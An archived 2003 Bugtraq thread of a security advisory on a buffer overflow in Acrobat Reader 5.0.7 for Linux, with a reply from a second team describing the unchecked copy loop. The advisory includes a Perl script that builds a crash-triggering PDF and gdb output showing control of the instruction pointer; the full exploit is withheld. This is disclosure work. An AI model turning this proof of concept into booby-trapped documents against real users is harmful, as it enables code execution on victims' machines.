107507 2003-07-10  19:29  /132 rader/ Paul Szabo <psz@maths.usyd.edu.au>
Importerad: 2003-07-10  19:29  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5505>
Ärende: Acroread 5.0.7 buffer overflow
------------------------------------------------------------
I. BACKGROUND

Acroread from http://www.adobe.com is the pre-eminent PDF file
viewer. The latest version Acroread 5.0.7 for Linux was released on
17 June 2003.

II. DESCRIPTION

Despite recent security fixes, an exploitable buffer overflow with
long URL strings remains. The overflow occurs when you click on the
link, and allows execution of arbitrary code. Acroread versions 5.0.7
and 5.0.5 were tested on Debian (woody) Linux; other acroread 5.*
versions on other UNIX platforms are expected also to be
vulnerable. (Configure Netscape as your browser, and do not have
Netscape running at the time you click.)

III. ANALYSIS

Produce a suitable test file using pdflatex e.g. with:

#!/usr/bin/perl --
#
# Demo for acroread 5.0.7 on Debian Linux
#
print '
Writing TeX file ...
';
# For acroread 5.0.5 use 248 Bs instead of 504
open P, '>attack.tex';
print P '
\documentclass[11pt]{letter}
\usepackage{times}
\usepackage[pdfpagemode=none,pdfstartview=FitH]{hyperref}
\begin{document}
   \href{mailto:X',("B"x504).("A"x4),'}
   {\texttt{mailto:X("B"x504).("A"x4)}}
\end{document}
';
close P;
#
print '
Running pdflatex ...
';
system 'pdflatex attack';
#
#!#

Acroread has a signal handler and may not crash when the link is
clicked, but gdb shows:

(gdb) run attack.pdf
Starting program: /Acroread507/Reader/intellinux/bin/acroread attack.pdf
Program received signal SIGSEGV, Segmentation fault.
(gdb) where
#0  0x40f50513 in mdNetscapeFront ()
   from /Acroread507/Reader/intellinux/plug_ins/wwwlink.api
Cannot access memory at address 0x41414141

IV. WORKAROUND

Remove the file .../Reader/*/plug_ins/wwwlink.api .

V. EXPLOIT

Censored. Fully working exploit sent to CERT.

VI. COMMENTS

Acroread 5.0.7 for Linux was released on 17 June 2003, and the README file
contains:
   New for Acrobat Reader 5.0.7
   A security patch was applied that solves the problem reported in
   CERT vulnerability 200132 whereby a weblink could execute shell 
   commands.  Acroread still uses 'sh -c' via system(3) but disallows
embedded single quotes and replaces dollar($) and backquote(`) by %24
and %60 in the URL, then quotes the URL with single quotes like
  sh -c DISPLAY=DISPL BROWSER 'URL' Seems that when given the example
exploit, in a knee-jerk reaction Adobe encoded the "special"
characters used. When told that the "shell meta-character soup" was
larger, they quoted the URL and, seeing how encoding did not work,
courageously banned embedded quotes; were too lazy to remove the
encoding. Should have replaced system(3) with fork/setenv/execv
instead.  The lengthening of the URL string prompted me to check how
acroread handles long replacements; but even "plain" long strings
cause it to fail.

The 5.0.7 README file also contains:
   New for Acrobat Reader 5.0.6
   A security patch was applied that solves the problem reported in
   http://online.securityfocus.com/archive/1/278984 where opening
   the font cache when the application starts up can unintentionally 
   cause the permissions of other files to change.
and confirm that this is solved in 5.0.7.

The changes from 5.0.5 to 5.0.7 are in libCoolType.so, EScript.api
and wwwlink.api only, so acroread 5.0.7 still announces itself, on
the splash screen and in Help AboutAcrobatReader, as 5.0.5. CoolType
was for 5.0.6, wwwlink for 5.0.7; is EScript for
http://www.kb.cert.org/vuls/id/184820 though that was meant to affect
"full" acrobat only?

Acroread versions 4.* do not seem vulnerable to the buffer overflow,
they chop the URL string after 1025 (!!??) bytes; but are vulnerable
to the "shell meta-character soup" (could be protected with the
workaround below).

VII. TIMELINE

13 Jun 2003  -10day advisory released
17 Jun 2003  Acroread 5.0.7 for Linux released
23 Jun 2003  iDefense and CERT alerted to buffer overflow
26 Jun 2003  Fully working exploit sent to iDefense
 1 Jul 2003  team@sec-labs.hack.pl finds same vulnerability
 9 Jul 2003  iDefense does not offer payment

VIII. REFERENCES

CERT vulnerability note
  http://www.kb.cert.org/vuls/id/200132

-10Day CERT Advisory on PDF Files (note that the workaround in the latter
message does not protect against the buffer overflow)
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010397.html
  http://lists.netsys.com/pipermail/full-disclosure/2003-June/010417.html

Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
(public report of the same vulnerability)
  http://www.securityfocus.com/archive/1/327335
  http://www.securityfocus.com/archive/1/328472

IX. AUTHOR

Paul Szabo - psz@maths.usyd.edu.au  http://www.maths.usyd.edu.au:8000/u/psz/
School of Mathematics and Statistics  University of Sydney   2006  Australia
(107507) /Paul Szabo <psz@maths.usyd.edu.au>/(Ombruten)

107394 2003-07-09  19:47  /37 rader/ sec-labs team <team@sec-labs.hack.pl>
Importerad: 2003-07-09  19:47  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5479>
Ärende: Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
------------------------------------------------------------
We can easily reproduce this bug on version 5.0.7 and 5.0.5 on
Slackware Linux and Phoenix and Mozilla browsers. You can choose
Netscape or NCSA compatibile browser in Adobe preferences, and
WWWLaunchNetscape and  WWWLaunchNCSA functions.

You should not have problem with this bug. It is quite simple to
reproduce. Just create .pdf file with long link, execute adobe, open
this file, then attach to it using gdb, put breakpoint on
WWWLaunchNetscape and click on link. There is loop in this function
that do something like this:

    while(*src != '\0')
        *dst++ = *src++;

As you can see there is no bounds checking.

best regards

-- 
sec-labs team [http://sec-labs.hack.pl]







-- 
sec-labs team [http://sec-labs.hack.pl]




-- 
sec-labs team [http://sec-labs.hack.pl]
(107394) /sec-labs team <team@sec-labs.hack.pl>/(Ombruten)
Bilaga (application/pgp-signature) i text 107395

107395 2003-07-09  19:47  /8 rader/ sec-labs team <team@sec-labs.hack.pl>
Importerad: 2003-07-09  19:47  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <5480>
Bilaga (text/plain) till text 107394
Ärende: Bilaga till: Re: [sec-labs] Adobe Acrobat Reader <=5.0.7 Buffer Overflow Vulnerability + PoC code
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)

iD8DBQE/C/lbZ4yD+a7QMvgRAn2gAJ45wAFYEVBaKbMyN8yGL8e33p3u5wCfWzd5
GyCT5Vz+k4MpBeIpunUU+98=
=PA+o
-----END PGP SIGNATURE-----
(107395) /sec-labs team <team@sec-labs.hack.pl>/----